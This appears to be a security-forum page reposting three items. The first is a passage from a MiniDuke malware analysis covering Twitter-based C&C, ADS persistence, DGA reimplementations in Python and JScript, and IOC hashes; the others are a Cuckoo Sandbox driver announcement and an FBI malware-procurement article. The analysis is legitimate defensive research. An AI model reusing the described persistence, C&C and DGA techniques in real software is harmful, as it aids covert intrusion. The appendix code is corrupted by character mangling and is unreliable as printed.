loaded by rundll32.exe and the current directory isn’t %TEMP%, the malware starts with gathering the same system information as described in the “Installation” section to decrypt configuration information. As with the previous version of MiniDuke, it checks for the presence of the following processes in the system: If any of these are found in the system the configuration information will be decrypted incorrectly, i.e. the malware will run on the system without any communication to C&C servers. If the configuration data is decrypted correctly, MiniDuke retrieves the Twitter page of [b @FloydLSchwartz does exist but has only retweets and no strings with the special tag. As the next step, MiniDuke gathers the following information from the infected systems: computer name and user domain name country code of the infected host IP address obtained from http://www.geoiptool.com OS version information domain controller name, user name, groups a user account belongs to a list of AV products installed onto the system Internet proxy configuration version of MiniDuke This information is then sent to the C&C server along with the request to download a payload. The final URL used to communicate with the C&C server looks like this: <url_start>/create.php?<rnd_param>=<system_info> Those tokens are derived as follows: url_start – the URL retrieved from the twitter account rnd_param – randomly generated of lower case alphabet characters parameter name in the query string of the URL system_info – base64 encoded and encrypted system information An example of such a URL is given below: The payload is downloaded in the file named “fdbywu” using the urlmon!URLDownloadToFileA API: The downloaded payload is a fake GIF8 file containing encrypted executable. The malware processes the downloaded file in the same way as previous samples of MiniDuke: it verifies the integrity of the file using RSA-2048, then decrypts it, stores in a file and finally executes it. The RSA-2048 public key to verify integrity of the executable inside the GIF file is the same as in the previous version of MiniDuke. [h=2]Twitter Generation Algorithm[/h] In the event that MiniDuke is unable to retrieve a C&C URL from this account, it generates a username to search for based on the current date. The search query changes roughly every seven days and is similar to the backup mechanism in previous versions that was using Google searches. A Python implementation of the algorithm can be found in Appendix B. [h=2]TwitterJS component[/h] The TwitterJS module is extracted by creating a copy of the Windows DLL cryptdll.dll, injecting a block of code into it and redirecting the exported functions to this code. Here is how the export address table of the patched binary looks after modifications. This file is then stored in an Alternate Data Stream (ADS) in NTUSER.DAT in the %USERPROFILE% folder. Finally this DLL is registered as the Open command when a drive is open, which has the effect of starting the bot every time the user opens a disk drive. Below you can find the content of the init.cmd script used by MiniDuke to install TwitterJS module onto the system. When loaded, TwitterJS instantiates the JScript COM object and decrypts a JScript file containing the core logic of the module. Prior to executing it, MiniDuke applies a light encoding to the script: The next images show the result of two separate obfuscations, we can see that the variables have different values. This is probably done to thwart security systems that scan at the entry points of the JScript engine. Result of first obfuscation Result of second obfuscation The purpose of this script is to use Twitter to find a C&C and retrieve JScript code to execute. It first generates a Twitter user to search for; this search term changes every 7 days and is actually a match to the real account name, not the Twitter account name. The bot then visits the Twitter profiles returned by the search and looks for links that end with “.xhtml“. When one is found, it replaces “.xhtml” with “.php” and fetches that link. Information about the computer is embedded in the Accept HTTP header. The first link on the retrieved page should contain base64 data; the name attribute of the link is used as a rolling XOR key to decrypt the JScript code. Finally, MiniDuke calculates a hash of the fetched script and compares it with a hardcoded hash in the TwitterJS script. If they match, the fetched script is executed by calling eval(). [h=2] The tale of the broken SHA-1[/h] The code hashing algorithm used by the component looks very much like SHA-1 but outputs different hashes (you can find the complete implementation in Appendix B. We decided to search for what was changed in the algorithm; one of our working hypotheses was that the algorithm might have been altered to make collisions feasible. We couldn’t find an obvious difference; all the constants and the steps of the algorithm were as expected. Then we noticed that for short messages only the second 32-bit word was different when compared to the original SHA-1. SHA1(‘test’) : a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 TwitterJS_SHA1(‘test’) : a94a8fe5dce4f01c1c4c0873d391e987982fbbd3 By examining how this 2nd word was generated we finally discovered that this was caused by a scope issue. As shown below the SHA-1 function used a variable named f: the function Z() is then called which also uses a variable named f without the var keyword, causing it to be treated as a global variable rather than local to the function. The end result is that the value of f is also changed in the SHA-1 function which affects the value of the 2nd word for that round and ultimately the whole hash for long messages. A likely explanation of how this problem came to be is that the variable names were changed to single letters using an automated tool prior to embedding it in the payload. The 2 f variables probably had different names in the original script which avoided the issue. So this leaves us with two takeaways: 1) The difference in the hashing algorithm was unintentional and 2) Always declare your local variables with the var keyword. ;-) [h=2]Twitter DGA accounts[/h] We generated the list of Twitter search terms for 2013-2014 and checked if any of those were registered. At the moment only one exists, @AA2ADcAOAA, which is the TwitterJS account that was generated between August 21st and 27th 2013. This account has no tweets. In an effort to discover potential victims, we registered the Twitter accounts corresponding to the current week both for the main and TwitterJS components and set up tweets with encrypted URLs so that an infected computer would reach out to our server. So far we have received connections via the TwitterJS accounts from four computers located in Belgium, France and the UK. We have contacted national CERTs to notify the affected parties. We detect the RTF exploit document as Win32/Exploit.CVE-2014-1761.D and the MiniDuke components as Win32/SandyEva.G. [h=3]Appendix A: SHA-1 hashes[/h] [TABLE] [TR] [TD]SHA-1[/TD] [TD]Description[/TD] [/TR] [TR] [TD]58be4918df7fbf1e12de1a31d4f622e570a81b93[/TD] [TD]RTF with Word exploit CVE-2014-1761[/TD] [/TR] [TR] [TD]b27f6174173e71dc154413a525baddf3d6dea1fd[/TD] [TD]MiniDuke main component (before config encryption)[/TD] [/TR] [TR] [TD]c059303cd420dc892421ba4465f09b892de93c77[/TD] [TD]TwitterJS javascript code[/TD] [/TR] [/TABLE] Appendix B: DGA algorithms main component DGA import sys import hashlib import datetime from array import * import base64 def init_params(date_time): duke_string = “vSkadnDljYE74fFk” to_hash = array(“B”) for ix in xrange(0×40): to_hash.append(0) for ix in xrange(len(duke_string)): to_hash[ix + 8] = ord(duke_string[ix]) to_hash[0] = (date_time.day / 7) to_hash[2] = date_time.month to_hash[4] = date_time.year & 0xFF to_hash[5] = date_time.year >> 8 return to_hash def hash_data(to_hash): m = hashlib.md5() m.update(to_hash.tostring()) hash_val = m.digest() first_dword = ord(hash_val[0]) | (ord(hash_val[1]) << 8) | (ord(hash_val[2])<<16) I (ord(hash_val[3]) << 24) last_dword = ord(hash_val[12]) | (ord(hash_val[13]) << 8) | (ord(hash_val[14]) <<16) | (ord(hash_val[15]) << 24) new_dword = (first_dword + last_dword) & 0xFFFFFFFF to_append = array(“B”, [new_dword & 0xFF, (new_dword >> 8) & 0xFF, (new_dword >>16) & 0xFF, (new_dword >> 24) & 0xFF]) return hash_val + to_append.tostring() def generate_twitter_dga(date_time): to_hash = init_params(date_time) hash_val = hash_data(to_hash) hash_val_encoded = base64.b64encode(hash_val) dga_len = ord(hash_val_encoded[0]) | (ord(hash_val_encoded[1]) << 8) | (ord(hash_val_encoded[2]) << 16) | (ord(hash_val_encoded[3]) << 24) dga_len = dga_len % 6 dga_len += 7 if hash_val_encoded[0] <= 0×39: hash_val_encoded[0] = 0×41 dga_res = “” for i in xrange(dga_len): if hash_val_encoded[i] == ‘+’: dga_res += ‘a’ elif hash_val_encoded[i] == ‘/’: dga_res += ’9? else: dga_res += hash_val_encoded[i] return dga_res start_date = datetime.datetime.strptime(sys.argv[1], “%Y-%m-%d”) number_of_weeks = long(sys.argv[2]) for ix in xrange(number_of_weeks): print generate_twitter_dga(start_date + datetime.timedelta(days=7 * ix)) [h=3]TwitterJS DGA[/h] function twitterjs_sha1(s) { x = Q(s) z = s.length * 8; x[z >> 5] |= 0×80 << (24 – z % 32); x[((z + 64 >> 9) << 4) + 15] = z; w = Array(80); a = 1732584193; b = -271733879; c = -1732584194; d = 271733878; e = -1009589776; for (i = 0; i < x.length; i += 16) { q = a; f = b; g = c; h = d; k = e; for (j = 0; j < 80; j++) { if (j < 16) w[j] = x[i + j]; else w[j] = Y(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1); t = Z(Z(Y(a, 5), N(j, b, c, d)), Z(Z(e, w[j]), (j < 20) ? 1518500249 : (j < 40) ? 1859775393 : (j < 60) ? -1894007588 : -899497514)); e = d d = c; c = Y(b, 30); b = a; a = t } a = Z(a, q); b = Z(b, f); c = Z(c, g); d = Z(d, h); e = Z(e, k) } return Array(a, b, c, d, e) } function Z(x, y) { f = 0xffff; l = (x & f) + (y & f); m = (x >> 16) + (y >> 16) + (l >> 16); return (m << 16) | (l & f) } function N(t, b, c, d) { if (t < 20) return (b & c) | ((~ & d); if (t < 40) return b ^ c ^ d; if (t < 60) return (b & c) | (b & d) | (c & d); return b ^ c ^ d } function Y(node_base_64, c) { return (node_base_64 << c) | (node_base_64 >>> (32 – c)) } function Q(s) { p = Array(s.length >> 2); for (i = 0; i < s.length * 8; i += 8) p[i >> 5] |= (s.charCodeAt(i / 8) & 0xff) << (24 – i % 32); return p } node_base_64 = new ActiveXObject(‘MSXML2.DOMDocument’).createElement(‘base64?); node_base_64.dataType = ‘bin.base64?; for (var year = 2013; year <= 2014; year++) { for (var month = 0; month < 12; month++) { for (var week = 0; week <= 4; week++) { hash = twitterjs_sha1(” + week + month + year); y = new ActiveXObject(‘ADODB.Stream’); y.Open; y.Type = 2; y.WriteText(” + hash[0] + hash[1] + hash[2]); y.Position = 0; y.Type = 1; // convert the date_seed to Base64 node_base_64.nodeTypedValue = y.Read; y.Close; username = node_base_64.text.replace(/.*([A-Za-z]\w{14})/, ‘$1?).substr(0, 7 + week); WScript.echo(year + ‘-’ + (month+1) + ” week ” + (week+1) + ” : ” + username); } } }
  24. Nytro

    zer0m0n v0.6

    [h=1]zer0m0n v0.6[/h] zer0m0n is a driver for Cuckoo Sandbox, it will perform kernel analysis during the execution of a malware. There are many ways for a malware author to bypass Cuckoo detection, he can detect the hooks, hardcodes the Nt* functions to avoid the hooks, detect the virtual machine... The goal of this driver is to offer the possibility for the user to choose between the classical userland analysis or a kernel analysis, which will be harder to detect or bypass. Actually, it only works for XP and 7 32 bit Windows machines, because of SSDT hooks usage ( :] ), but we plan supporting other OSes. Sursa: https://github.com/conix-security/zer0m0n
  25. FBI is officially looking for malware development The FBI (Federal Bureau of Investigation) has issued a solicitation for malware development confirming the use of malicious code for investigation. The proliferation of malware in the cyber space is not a surprise, according recent reports the number of new malicious code instance is rapidly increasing. State-sponsored hackers and cyber criminals are principally responsible for the spike, the risks are enormous for internet users that in many cases are helpless in from of cyber threats, common security countermeasures like antivirus are not enough to protect their asset online. What do you think about the possibility that malware is designed or spread by law enforcement? There is the concrete risk that users’ PC everywhere on the planet will be infected by malicious code designed by agency like the FBI, law enforcement makes a large use of malicious code during their investigation despite they deny any accusation. The Federal Bureau of Investigation (FBI) is one of the agencies most active in the use of malware and a recent solicitation (RFQ1307B) of DoJ confirms it. “The Federal Bureau of Investigation has a requirement for malware. Please see attached combined synopsis/solicitation for complete requirement.“ The feds recently posted an online listing confirming that the Bureau is looking to purchase malware from a commercial supplier and is now accepting applications. The FBI offers a one-year contract with four one-year options, this is reported in the requirement session: “The collection of malware from multiple industries, law enforcement and research sources is critical to the success of the FBIs mission to obtain global awareness of malware threat. The collection of this malware allows the FBI to provide actionable intelligence to the investigator in both criminal and intelligence matters.” It is requested to the malware supplier to give the FBI about 30GB to 40GB of malware per day through a feed and the feds have to be able also to retrieve the feed directly. Currently exist (or system currently exists that can produce the feed) Contain a rollup of sharable new malware (both unique and variants) Include a malicious URL report (Reference Section 2.3.2) Be organized by SHA1 signatures Be updated once every 24 hours Be a snapshot of the prior 24 hours Be, on average, 30GB – 40GB per day Be able to retrieve feed in an automated way through machine-to-machine communication Initiations of accessing feed shall be pulled by FBI not pushed to FBI Which are the risks? The malware proliferation, from spyware to cyber weapons, could represent a serious problem, F-Secure’s Chief Research Officer Company Mikko Hyppönen at the TrustyCon conference in San Francisco explained that almostevery government is spending a great effort to improve its cyber capabilities. Chris Soghoian, principal technologist with the American Civil Liberties Union, during the recent TrustyCon conference highlighted the possibility that the government will exploit automated update services to serve malware and spy on users. Is this the next surveillance frontiers? Instead to exploit consolidated techniques like phishing and watering hole, intelligence agencies and law enforcement could use application updates to deliver malware on victims’ systems. “The FBI is in the hacking business. The FBI is in the malware business,” “The FBI may need more than these two tools to deliver malware. They may need something else and this is where my concern is. This is where we are going and why I’m so worried about trust.” Soghoian said. Malware proliferation is a serious menace for the cyberspace, I understand the need of law enforcement agencies, but the use of malicious code must be regulated by a globally accepted framework to avoid violation of users’ rights. Pierluigi Paganini (Security Affairs – FBI,malware) Sursa: FBI is officially looking for malware development | Security Affairs
×
×
  • Create New...